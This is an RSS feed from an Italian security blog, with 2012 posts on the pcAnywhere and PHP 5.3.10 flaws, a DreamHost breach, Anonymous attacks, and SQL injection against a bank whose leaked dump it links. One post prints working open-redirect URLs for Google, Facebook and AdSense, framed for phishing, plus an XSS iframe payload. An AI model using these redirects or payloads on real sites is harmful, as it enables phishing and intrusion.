<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Capn3m0 WebSecurity &#187; Vulnerabilità</title>
	<atom:link href="http://www.capn3m0.org/category/sicurezza/vulnerabilita-sicurezza/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.capn3m0.org</link>
	<description>...hacking, security, wifi and more...</description>
	<lastBuildDate>Wed, 08 Feb 2012 16:58:39 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>pcAnywhere, Symantec consiglia di disinstallarlo!</title>
		<link>http://www.capn3m0.org/pcanywhere-symantec-consiglia-disinstallarlo.html</link>
		<comments>http://www.capn3m0.org/pcanywhere-symantec-consiglia-disinstallarlo.html#comments</comments>
		<pubDate>Sun, 05 Feb 2012 18:21:25 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[furto codice symantec]]></category>
		<category><![CDATA[pcanywhere vulnerabilità]]></category>
		<category><![CDATA[symantec]]></category>
		<category><![CDATA[symantec pcanywhere]]></category>
		<category><![CDATA[symantec vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=4830</guid>
		<description><![CDATA[In seguito alle notizie diffuse negli ultimi mesi circa un furto di codice sorgente dei software Symantec, la stessa azienda recentemente ha invitato tutti gli utenti dell&#8217;applicazione pcAnywhere a disinstallarla o disabilitarla. Il furto del codice ha interessato tutta la famiglia degli applicativi Symantec del 2006 ossia: Norton Antivirus Corporate Edition Norton Internet Security Norton [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2012/02/symantec.gif" rel="lightbox[4830]" title="Symantec"><img class="alignleft size-thumbnail wp-image-4831" title="Symantec" src="http://www.capn3m0.org/wp-content/uploads/2012/02/symantec-150x150.gif" alt="pcAnywhere, Symantec consiglia di disinstallarlo!" width="150" height="150" /></a>In seguito alle notizie diffuse negli ultimi mesi circa un furto di codice sorgente dei software <strong>Symantec</strong>, la stessa azienda recentemente ha invitato tutti gli utenti dell&#8217;applicazione <strong>pcAnywhere</strong> a disinstallarla o disabilitarla.</p>
<p>Il furto del codice ha interessato tutta la famiglia degli applicativi Symantec del 2006 ossia:</p>
<ul>
<li>Norton Antivirus Corporate Edition</li>
<li>Norton Internet Security</li>
<li>Norton SystemWorks (Norton Utilities and Norton GoBack)</li>
<li>pcAnywhere</li>
</ul>
<p>Al momento la vulnerabilità è nota solo per <strong>pcAnywhere</strong> e Symantec informa che chi ha avuto questo applicativo installato è stato <strong>esposto ad un rischio maggiore</strong> per tutto il tempo dell&#8217;attività del prodotto.</p>
<p>Tutti gli utenti di <strong>pcAnywhere</strong> sono quindi invitati a disabilitarlo o ad aggiornarlo all&#8217;ultima release.</p>
<p>Maggiori informazioni potete trovarle direttamente nel sito Symantec a <a title="Symantec" href="http://www.symantec.com/theme.jsp?themeid=anonymous-code-claims&amp;inid=us_ghp_banner1_anonymous" target="_blank">questa pagina</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/pcanywhere-symantec-consiglia-disinstallarlo.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Rilasciato Php 5.3.10!</title>
		<link>http://www.capn3m0.org/rilasciato-php-5.3.10.html</link>
		<comments>http://www.capn3m0.org/rilasciato-php-5.3.10.html#comments</comments>
		<pubDate>Fri, 03 Feb 2012 08:52:20 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[falla php]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[php5.3.10]]></category>
		<category><![CDATA[remote code execution]]></category>
		<category><![CDATA[sicurezza php]]></category>
		<category><![CDATA[vulnerabilità php]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=4814</guid>
		<description><![CDATA[Ieri è stata rilasciata la versione 5.3.10 del Php per risolvere una falla di sicurezza! La vulnerabilità individuata da Stefan Esser consente di eseguire codice sulla macchina vittima con i privilegi dell&#8217;utente Web (remote code execution). Come riportato su SecurityTracker mandando dati manipolati al Php si può generare un errore nella memoria del php_register_variable_ex() consentendo [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2012/02/php.png" rel="lightbox[4814]" title="Php 5.3.10"><img class="alignleft size-thumbnail wp-image-4815" title="Php 5.3.10" src="http://www.capn3m0.org/wp-content/uploads/2012/02/php-150x150.png" alt="Rilasciato Php 5.3.10!" width="150" height="150" /></a>Ieri è stata rilasciata la versione <strong>5.3.10</strong> del <strong>Php</strong> per risolvere una <strong>falla di sicurezza</strong>!</p>
<p>La <strong>vulnerabilità</strong> individuata da Stefan Esser consente di eseguire codice sulla macchina vittima con i privilegi dell&#8217;utente Web (<strong>remote code execution</strong>). Come riportato su <a title="SecurityTracker" href="http://securitytracker.com/id/1026631" target="_blank"><strong>SecurityTracker</strong></a> mandando dati manipolati al Php si può generare un errore nella memoria del <strong>php_register_variable_ex()</strong> consentendo di eseguire codice.</p>
<p>Per tutti coloro che amministrano Server è consigliabile provvedere ad aggiornare alla versione <strong>Php 5.3.10</strong> quanto prima.</p>
<p><a title="Php 5.3.10" href="http://www.php.net/archive/2012.php#id2012-02-02-1" target="_blank">Qui</a> trovate l&#8217;annuncio ufficiale di Php.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/rilasciato-php-5.3.10.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Vulnerabilità Open Redirect e XSS per Google e FaceBook</title>
		<link>http://www.capn3m0.org/vulnerabilita-xss-open-redirection-google.html</link>
		<comments>http://www.capn3m0.org/vulnerabilita-xss-open-redirection-google.html#comments</comments>
		<pubDate>Thu, 26 Jan 2012 22:11:24 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[facebook exploit]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[google exploit]]></category>
		<category><![CDATA[opne redirect]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[web security]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=4704</guid>
		<description><![CDATA[Recentemente sono state individuate alcune vulnerabilità tra le pagine dei Servizi di Google e FaceBook. Sono falle di tipo Open Redirect che permettono di effettuare un redirect senza necessità di manipolare stringhe o eseguire azioni particolari. Open, infatti, sta ad indicare che il sito affetto da tale falla non effettua alcun controllo sull&#8217;input ed esegue il codice [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-thumbnail wp-image-4705" title="Google" src="http://www.capn3m0.org/wp-content/uploads/2012/01/Google-21-150x150.jpg" alt="Vulnerabilità Open Redirect e XSS per Google e FaceBook" width="150" height="150" /></p>
<p>Recentemente sono state individuate <strong>alcune vulnerabilità</strong> tra le pagine dei Servizi di <strong>Google e FaceBook</strong>. Sono falle di tipo <strong>Open Redirect </strong>che permettono di effettuare un redirect senza necessità di manipolare stringhe o eseguire azioni particolari.</p>
<p>Open, infatti, sta ad indicare che il sito affetto da tale falla non effettua alcun controllo sull&#8217;input ed <strong>esegue il codice per cui è programmato sempre e comunque</strong>. Il vantaggio di poter sfruttare vulnerabilità come questa è quello di poter utilizzare url di domini di cui la gente non mette in dubbio la provenienza (<strong>Google appunto</strong>) per farli cliccare e redirettarli a siti di <strong>phishing</strong> o similari.</p>
<p>Immaginate l&#8217;utente medio che riceve un&#8217;<strong>email clone di Google</strong> che gli indica di cliccare  un  url del dominio &#8220;<strong>google.com</strong>&#8221; ed inserire i suoi dati per via di un qualche motivo plausibile. <strong>Quanti penserebbero che quell&#8217;url nasconda una minaccia?</strong></p>
<p>In questo caso l&#8217;url affetto da tale vulnerabilità è appartenente al Servizio <strong>Google Accounts</strong> ed è il seguente:</p>
<p><cite><strong>https://accounts.google.com/o/oauth2/auth?redirect_uri=http://www.sitomalevolo.com</strong></cite></p>
<p>Allo stato attuale la falla è <strong>già stata risolta</strong> e provando un redirect verso <strong>capn3m0.org</strong> si ottiene un errore di &#8220;Bad Request&#8221;:</p>
<p><a href="https://accounts.google.com/o/oauth2/auth?redirect_uri=www.capn3m0.org" target="_blank">https://accounts.google.com/o/oauth2/auth?redirect_uri=www.capn3m0.org</a></p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2012/01/googlebadrequest.jpg" rel="lightbox[4704]" title="Google Bad Request"><img class="aligncenter size-medium wp-image-4706" title="Google Bad Request" src="http://www.capn3m0.org/wp-content/uploads/2012/01/googlebadrequest-300x118.jpg" alt="Vulnerabilità Open Redirect e XSS per Google e FaceBook" width="300" height="118" /></a></p>
<p>Questa vulnerabilità è stata individuata da <strong>Ucha Gobejishvili aka</strong><strong> longrifle0x</strong> che vanta solo nell&#8217;ultima settimana una serie di XSS in siti degni di nota:<strong> Google, Apple, Sony Ericcsson</strong>.</p>
<p>Sempre<strong> longrifle0x</strong> ha individuato una<a href="http://thehackernews.com/2012/01/cross-site-scripting-xss-vulnerability.html?utm_source=feedburner&amp;utm_medium=twitter&amp;utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Daily+Cyber+News+Updates%29" target="_blank"> vulnerabilità <strong>XSS</strong></a> alla pagina delle <strong>Google App for Business</strong>. Per verificare la vulnerabilità è necessario andare all&#8217;url:</p>
<p><a title="Google Apps for Business" href="https://www.google.com/a/cpanel/premier/new3?hl=en" target="_blank">https://www.google.com/a/cpanel/premier/new3?hl=en</a></p>
<p>ed inserire nel campo &#8220;Domain&#8221; questo codice:</p>
<p><strong><em>&lt;IFRAME SRC=&#8221;javascript:alert(&#8216;XSS&#8217;);&#8221;&gt;&lt;/IFRAME&gt;</em></strong></p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2012/01/xss-in-google.png" rel="lightbox[4704]" title="Google XSS"><img class="aligncenter size-medium wp-image-4710" title="Google XSS" src="http://www.capn3m0.org/wp-content/uploads/2012/01/xss-in-google-300x137.png" alt="Vulnerabilità Open Redirect e XSS per Google e FaceBook" width="300" height="137" /></a></p>
<p><strong><a title="longrifle0x Hacked Sites" href="http://xssed.com/archive/author=longrifle0x/" target="_blank">Qui</a></strong> il suo &#8220;curriculum&#8221;! <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_wink.gif' alt="Vulnerabilità Open Redirect e XSS per Google e FaceBook" class='wp-smiley' title="Vulnerabilità Open Redirect e XSS per Google e FaceBook pics" /> </p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2012/01/fb.jpg" rel="lightbox[4704]" title="FaceBook Logo"><img class="alignright size-full wp-image-4708" title="FaceBook Logo" src="http://www.capn3m0.org/wp-content/uploads/2012/01/fb.jpg" alt="Vulnerabilità Open Redirect e XSS per Google e FaceBook" width="125" height="78" /></a>La seconda vulnerabilità, <a href="http://thehackernews.com/2012/01/url-redirection-vulnerability-in-google.html" target="_blank">individuata da <strong>ZeRtOx</strong></a> del gruppo <strong>Devitel</strong>, riguarda <strong>FaceBook</strong> ed è sempre di tipo <strong>Open Redirect.</strong> Il codice è il seguente:</p>
<p><strong><cite>http://www.facebook.com/l.php?h=5AQH8ROsPAQEOTSTw7sgoW1LhviRUBr6iFCcj4C8YmUcC8A&amp;u=www.sitomalevolo.com</cite></strong></p>
<p>e attualmente è ancora presente come dimostra il link che rediretta a<strong> capn3m0.org:</strong></p>
<p><a href="http://www.facebook.com/l.php?h=5AQH8ROsPAQEOTSTw7sgoW1LhviRUBr6iFCcj4C8YmUcC8A&amp;u=www.capn3m0.org" target="_blank">http://www.facebook.com/l.php?h=5AQH8ROsPAQEOTSTw7sgoW1LhviRUBr6iFCcj4C8YmUcC8A&amp;u=www.capn3m0.org</a></p>
<p>Infine segnalo una terza vulnerabilità <strong>Open Redirect</strong> sempre per i Servizi di <strong>Google: Ad Services.</strong> I banner di Adsense sono associati ad un url fatto nel seguente modo:</p>
<p style="padding-left: 30px;">http://www.googleadservices.com/pagead/aclk?<br />
<strong>sa</strong>=L<br />
&amp;<strong>ai</strong>=BCN0tjMAhT9ijEq2Q0QXP1tm2BKGTn-sB4e7Th0fAjbcB8IQOEAEYASCZ0NoLOABQg7et0Pn_____AWD98vyD3BCgAYfM69oDsgEPd3d3LmNhcG4zbTAub3JnugEKMzM2eDI4MF9hc8gBBNoBUWh0dHA6Ly93d3cuY2FwbjNtMC5vcmcvZmlsZXNoYXJpbmctcG9zdC1tZWdhdXBsb2FkLWNoaXVzaS1maWxlc29uaWMtdXBsb2FkZWQuaHRtbIACAbgCGMgC4afaFKgDAfUDAAAgwPUDAAAAEIgGAaAGBA<br />
&amp;<strong>num</strong>=1<br />
&amp;<strong>cid</strong>=5GhoQFqmzEdFESSc_Vjf5Gxi<br />
&amp;<strong>sig</strong>=AOD64_2aoaqhlTxnKAENG806XtTTXpAjFw<br />
&amp;<strong>client</strong>=ca-pub-XXXXXXXXXXXXXXXX<br />
&amp;<strong>adurl</strong>=<strong>http://www.sitomalevolo.com</strong></p>
<p>I parametri che riceve in input devono essere tutti corretti ad eccezione del campo <strong>adurl</strong> che invece viene valorizzato con il link verso cui vogliamo che rediretti.</p>
<p>Come potete immaginare trovare un link con tutti i dati corretti è molto semplice. Basta navigare tra i siti che mostrano banner di <strong>Google AdSense</strong> e copiarsi il link.</p>
<p>Quest&#8217;ultima falla l&#8217;ho trovata ispirato dalle due precedenti mentre scrivevo l&#8217;articolo. Se conoscete chi ne ha parlato prima di me segnalatemelo che provvederò a mettere l&#8217;autore.</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/vulnerabilita-xss-open-redirection-google.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DreamHost, cambio password per tutti i Clienti!</title>
		<link>http://www.capn3m0.org/dreamhost-cambio-password-tutti-client.html</link>
		<comments>http://www.capn3m0.org/dreamhost-cambio-password-tutti-client.html#comments</comments>
		<pubDate>Sun, 22 Jan 2012 10:56:39 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[dreamhost]]></category>
		<category><![CDATA[dreamhost account ftp]]></category>
		<category><![CDATA[dreamhost change password]]></category>
		<category><![CDATA[dreamhost violated]]></category>
		<category><![CDATA[password hack]]></category>
		<category><![CDATA[sicurezza dreamhost]]></category>
		<category><![CDATA[vulnerabilità dreamhost]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=4655</guid>
		<description><![CDATA[DreamHost tra i più grandi fornitori di Servizi Hosting Americani la scorsa notte ha inviato un&#8217;email a tutti i suoi Clienti invitandoli a modificare tutte le password Ftp poiché c&#8217;è la possibilità che queste siano finite in mano ad un gruppo di hackers. L&#8217;azienda ha provveduto ad effettuare un cambio password massivo che ha richiesto un [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2012/01/dreamhost.gif" rel="lightbox[4655]" title="dreamhost"><img class="alignleft size-thumbnail wp-image-4656" title="dreamhost" src="http://www.capn3m0.org/wp-content/uploads/2012/01/dreamhost-150x150.gif" alt="DreamHost, cambio password per tutti i Clienti!" width="150" height="150" /></a><strong><a title="DreamHost" href="http://dreamhost.com/" target="_blank">DreamHost</a></strong> tra i più grandi fornitori di Servizi Hosting Americani la scorsa notte ha inviato un&#8217;email a tutti i suoi Clienti invitandoli a <strong>modificare tutte le password Ftp</strong> poiché c&#8217;è la possibilità che queste siano finite in mano ad un gruppo di hackers.</p>
<p>L&#8217;azienda ha provveduto ad effettuare un cambio password massivo che ha richiesto un po&#8217; più del previsto dato che attualmente DreamHost gestisce oltre 1 milione di siti web. DreamHost ha anche pregato i propri Clienti <strong>di cambiare le password delle caselle email</strong> utilizzate come riferimento su DreamHost.</p>
<p>A questo link è possibile vedere gli aggiornamenti effettuati in tempo record da DreamHost:</p>
<p><a href="http://www.dreamhoststatus.com/2012/01/20/changing-ftpshell-passwords-due-to-security-issue/" target="_blank">http://www.dreamhoststatus.com/2012/01/20/changing-ftpshell-passwords-due-to-security-issue/</a></p>
<p>dove si può riscontrare che l&#8217;intervento di cambio password è ormai terminato.</p>
<p>Questo il testo dell&#8217;email inviata ai Clienti:</p>
<blockquote><p> IMPORTANT INFORMATION: We are writing to let you know that there may have been illegal and unauthorized access to some of your passwords at DreamHost today. <em><strong>Our security systems detected the potential breach this morning and we immediately took the defensive precaution of expiring and resetting all FTP/shell access passwords for all DreamHost customers and their users.</strong></em> There are three different types of passwords at DreamHost: a Web panel password (for logging in to the panel), e-mail passwords, and FTP/shell access passwords. Only the FTP/shell access passwords appear to have been compromised by the illegal access. Web panel passwords, e-mail passwords, and billing information for DreamHost customers were not affected or accessed. Refer to the following DreamHost status post for details:<a href="http://www.dreamhoststatus.com/2012/01/20/changing-ftpshell-passwords-due-to-security-issue/">http://www.dreamhoststatus.com/2012/01/20/changing-ftpshell-passwords-due-to-security-issue/</a></p>
<p>IMPORTANT ACTION REQUIRED:</p>
<p>1. To create a new FTP/shell access password for your DreamHost account, please log in to your DreamHost Web panel (https://panel.dreamhost.com/), select &#8220;Manage Users&#8221; in the top left, then select &#8220;Edit&#8221; next to each user, and type in a new password. Make sure you click &#8220;Save Changes&#8221; at the bottom of the page.</p>
<p>2. We are also requesting that you change your e-mail password. We are not enforcing this change at this time as we do not believe that e-mail passwords were compromised. However we strongly recommend that you change your e-mail password as a precaution. To change the passwords for your e-mail users or yourself, log in to the DreamHost panel at (https://panel.dreamhost.com/), select &#8220;Manage Email&#8221; in the top left, select &#8220;Edit&#8221; next to each e-mail user address, and choose a new password for each. Make sure you click &#8220;Save Changes&#8221; at the bottom of the page.</p>
<p>We sincerely apologize for any inconvenience this may cause. If you have any additional questions about this process, please contact us through the support page in the panel.</p>
<p>Note that DreamHost will never ask you for personal or account information in an e-mail. Please exercise caution if you receive any other e-mails that ask for personal information or direct you to a Web site where you are asked to provide personal information.</p>
<p>Sincerely,</p>
<p>The DreamHost Team</p></blockquote>
<p>Come <a href="http://blog.dreamhost.com/2012/01/21/security-update/" target="_blank">spiega </a><strong>Simon Anderson</strong>, CEO di DreamHost, in risposta ad un cliente:<a href="http://www.capn3m0.org/wp-content/uploads/2012/01/simonanderson.jpg" rel="lightbox[4655]" title="simonanderson"><img class="alignright size-thumbnail wp-image-4657" title="simonanderson" src="http://www.capn3m0.org/wp-content/uploads/2012/01/simonanderson-150x150.jpg" alt="DreamHost, cambio password per tutti i Clienti!" width="150" height="150" /></a></p>
<blockquote><p>our systems have stored and used encrypted passwords for a number of years, however <em><strong>the hacker found a legacy pool of unencrypted FTP/shell passwords in a database table that we had not previously deleted</strong></em>. We’ve now confirmed that there are no more legacy unencrypted passwords in our systems. And we’re investigating further measures to ensure security of passwords including when a customer requests their password by email (this was not the issue here, though). Re your shell accounts, I’d suggest that you select a new password just to be sure.</p></blockquote>
<p>l&#8217;<strong>hacker ha avuto accesso ad una Tabella di un Database</strong> che per errore conteneva alcuni <strong>account Ftp e Shell non criptati</strong> che han poi permesso l&#8217;accesso a tutti i dati dei Clienti.</p>
<p>Per ora non ci sono state azioni/attacchi massivi verso gli account hackerati  e con il cambio password e la patch della vulnerabilità il problema dovrebbe essere risolto!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/dreamhost-cambio-password-tutti-client.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Alpha Team ancora a segno: Banca Sistema!</title>
		<link>http://www.capn3m0.org/alpha-team-sql-inject-banca-sistema.html</link>
		<comments>http://www.capn3m0.org/alpha-team-sql-inject-banca-sistema.html#comments</comments>
		<pubDate>Fri, 13 Jan 2012 20:22:32 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[Alpha_Team]]></category>
		<category><![CDATA[anonymous]]></category>
		<category><![CDATA[banca sistemi hacked]]></category>
		<category><![CDATA[dump database]]></category>
		<category><![CDATA[italia gov]]></category>
		<category><![CDATA[pr0_alpha_team]]></category>
		<category><![CDATA[sicurezza informatica]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=4540</guid>
		<description><![CDATA[L&#8217;Alpha_Team ancora una volta torna a far parlare di sé per un nuovo attacco ad una banca: la Banca Sistema! La protesta di internet negli ultimi giorni sta creando parecchi grattacapi ai sistemisti di Server &#8220;importanti&#8221;. La settimana scorsa l&#8217;Alpha_Team si era dichiarato al mondo rilasciando una lista di siti istituzionali di cui avevano violato [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2012/01/bancasistemalogo.jpg" rel="lightbox[4540]" title="Banca Sistemi"><img class="alignleft size-thumbnail wp-image-4541" title="Banca Sistemi" src="http://www.capn3m0.org/wp-content/uploads/2012/01/bancasistemalogo-150x39.jpg" alt="Alpha Team ancora a segno: Banca Sistema!" width="150" height="39" /></a>L&#8217;<a title="Alpha_Team Twitter" href="https://twitter.com/#!/pr0_alpha_team" target="_blank"><strong>Alpha_Team</strong></a> ancora una volta torna a far parlare di sé per un nuovo attacco ad una banca: la <a title="Banca Sistema" href="http://www.bancasistema.it/it/index_it.php" target="_blank"><strong>Banca Sistema</strong></a>!</p>
<p>La protesta di internet negli ultimi giorni sta creando parecchi grattacapi ai sistemisti di Server &#8220;importanti&#8221;. La settimana scorsa l&#8217;Alpha_Team si era dichiarato al mondo rilasciando una lista di siti istituzionali di cui avevano <a title="Siti istituzionali violati dal pr0_alpha_team" href="http://www.capn3m0.org/siti-istituzionali-violati-pr0_alpha_team.html"><strong>violato i Database</strong></a>. Tra questi vari siti c&#8217;era &#8220;<a href="http://italia.gov.it" target="_blank"><strong>italia.gov.it</strong></a>&#8221; che dopo l&#8217;attenzione ricevuta da parte dell&#8217;Alpha_Team ieri è stata vittima di un <a title="Anonymous lancia Operation Italy" href="http://www.capn3m0.org/anonymous-lancia-operation-italy.html" target="_blank">secondo attacco</a> di tipo <strong>DDOS</strong> questa volta firmato dal noto movimento di protesta on line <strong>Anonymous</strong>.</p>
<p>Come loro solito hanno pubblicato <strong>alcune delle informazioni sottratte </strong>dalle quali si riscontra che l&#8217;attacco anche in questo caso è stato di tipo <a title="Sql Injection Wikipedia" href="http://en.wikipedia.org/wiki/SQL_injection" target="_blank"><strong>Sql Injection</strong></a>. L&#8217;Alpha_Team non ha rilasciato informazioni in merito ma analizzando il <strong>dump a <a title="Dump Db Banca Sistemi" href="http://sprunge.us/jUUA" target="_blank">questo link</a></strong> si possono leggere l&#8217;information schema e alcuni records di varie tabelle del Database del sito della Banca.</p>
<p>Come potete vedere le Tabelle alle quali hanno avuto accesso sono tutte relative al sito e riguardano le varie aree dello stesso (le proposte on line, l&#8217;elenco delle news,etc) mentre altre sono invece a uso interno dei dipendenti/sistemisti come i <strong>dati di accesso delle caselle email</strong> o la <strong>lista degli utenti</strong> del sito, <strong>Administrator</strong> incluso.</p>
<p>Di queste notizie, come al solito, pochi parlano e le stesse <strong>vittime non comunicano nulla sull&#8217;attacco</strong>. Né sui loro siti né ai loro Clienti.</p>
<p>Se oltre questo fatto, già grave, si aggiunge che, come abbiamo visto nell&#8217;<a title="Intervista: 10 domande al pr0_alpha_team (aka Alpha_Team)" href="http://www.capn3m0.org/intervista-10-domande-al-pr0_alpha_team.html"><strong>intervista all&#8217;Alpha_Team</strong></a>, le falle di sicurezza non vengono corrette di sicuro il quadro generale della <strong>sicurezza informatica</strong> in Italia non ne esce positivo. Almeno per quelle &#8220;grandi&#8221; società dove ci si aspetta che la sicurezza sia un punto di forza!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/alpha-team-sql-inject-banca-sistema.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Anonymous lancia Operation Italy</title>
		<link>http://www.capn3m0.org/anonymous-lancia-operation-italy.html</link>
		<comments>http://www.capn3m0.org/anonymous-lancia-operation-italy.html#comments</comments>
		<pubDate>Fri, 13 Jan 2012 00:23:27 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[Alpha_Team]]></category>
		<category><![CDATA[anonymous]]></category>
		<category><![CDATA[operation italy]]></category>
		<category><![CDATA[opitaly]]></category>
		<category><![CDATA[pr0_alpha_team]]></category>
		<category><![CDATA[sito governo ddos]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=4537</guid>
		<description><![CDATA[Anonymous colpisce ancora! Anonymous, la famosa rete di hackers che da tempo effettua azioni di hacking verso siti sensibili per rappresentare la voce del popolo, questo pomeriggio ha eseguito un attacco di tipo DDOS (Distributed Denial Of Service) che ha portato all&#8217;irraggiungibilità del dominio &#8220;italia.gov.it&#8221; per tutto il pomeriggio. Durante lo stesso attacco è stato [...]]]></description>
			<content:encoded><![CDATA[<p title="Sito Governo Italiano"><img class="alignleft size-thumbnail wp-image-4538" title="Anonymous Operation Italy" src="http://www.capn3m0.org/wp-content/uploads/2012/01/anonymous-150x150.png" alt="Anonymous lancia Operation Italy" width="150" height="150" /><a title="Blog Ufficiali Anonymous Italia" href="http://anon-news.blogspot.com/" target="_blank"><strong>Anonymous</strong></a> colpisce ancora! <strong>Anonymous</strong>, la famosa rete di hackers che da tempo effettua azioni di hacking verso siti sensibili per rappresentare la voce del popolo, questo pomeriggio <strong>ha eseguito un attacco di tipo DDOS (Distributed Denial Of Service)</strong> che ha portato all&#8217;irraggiungibilità del dominio &#8220;<a href="http://www.italia.gov.it" target="_blank"><strong>italia.gov.it</strong></a>&#8221; per tutto il pomeriggio. Durante lo stesso attacco è stato preso di mira anche il sito dei neofascisti di &#8220;<strong></strong><a title="Casa Pound" href="http://www.casapound.org/" target="_blank"><strong>casapound.org</strong></a>&#8221; che allo stato attuale appare ancora offline (pagina di default di Apache).</p>
<p>Proprio qualche giorno fa avevamo <a title="Intervista: 10 domande al pr0_alpha_team (aka Alpha_Team)" href="http://www.capn3m0.org/intervista-10-domande-al-pr0_alpha_team.html">intervistato</a> l&#8217;<a title="Alpha_Team Twitter" href="https://twitter.com/#!/pr0_alpha_team" target="_blank"><strong>Alpha_Team</strong></a>, una crew di giovani ragazzi italiani che sfruttando una vulnerabilità Sql Injection aveva avuto accesso ed eseguito un dump sempre del sito <strong>italia.gov.it</strong>. A <a title="Siti istituzionali violati dal pr0_alpha_team" href="http://www.capn3m0.org/siti-istituzionali-violati-pr0_alpha_team.html">questo articolo</a> potete trovare maggiori informazioni e il dump in questione.</p>
<p>Anonymous con il comunicato pubblicato stamani reperibile <a title="Comunicato OpItaly Anonymous" href="http://pastebin.com/ZV888rrV" target="_blank">qui</a> accusa il neo Governo Italiano di aver fatto bei discorsi ma pochi fatti:</p>
<p><strong></strong><cite></cite><cite>Il nuovo governo si è presentato con l&#8217;aspetto frigido di chi non avendo mai praticato la politica dovrebbe risultare esente dalle tentazioni che noi italiani ben conosciamo.</cite></p>
<p><cite></cite><cite>Sventolando parole a lungo agognate quali equità, giustizia sociale e rigore. Ebbene di queste non s&#8217;è ancora vista l&#8217;ombra, escluso il contegno con cui vi presentate ai media. <strong>Sappiate che siete sotto osservazione da più parti, e che non basteranno quattro buoni propositi.</strong></cite></p>
<p><cite>[...]</cite></p>
<p><cite>Anonymous e tutti i cittadini liberi e consapevoli non resteranno a guardare.</cite></p>
<p><iframe title="YouTube video player" class="youtube-player" type="text/html" width="425" height="344" src="http://www.youtube.com/embed/sZfTmYSyp1Q" frameborder="0" allowFullScreen="true"> </iframe></p>
<p>Con questo comunicato e per tali motivazioni <strong>Anonymous</strong> informa che tornerà all&#8217;attacco e, dopo il DDOS odierno lancia l&#8217;operazione <a title="Anonymous Operation Italy" href="https://twitter.com/#!/search?q=%23OperationItaly" target="_blank"><strong>#Operation Italy</strong></a> o <a title="Anonymous OpItaly" href="https://twitter.com/#!/search?q=%23OperationItaly" target="_blank"><strong>#OpItaly</strong></a> per il giorno <strong>13 Febbraio 2012</strong>. L&#8217;obiettivo dell&#8217;attacco non è stato ancora deciso e verrà reso noto solo poco prima tramite gli hastag Twitter indicati in precedenza come accaduto oggi.</p>
<p>Aspettiamo il 13 Febbraio e vediamo cosa succede.</p>
<p>Keep in touch.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/anonymous-lancia-operation-italy.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; osCommerce v3.0a5 Multiple Vulnerabilities</title>
		<link>http://www.capn3m0.org/exploit-oscommerce-v3.0a5-multiple-vulnerabilities.html</link>
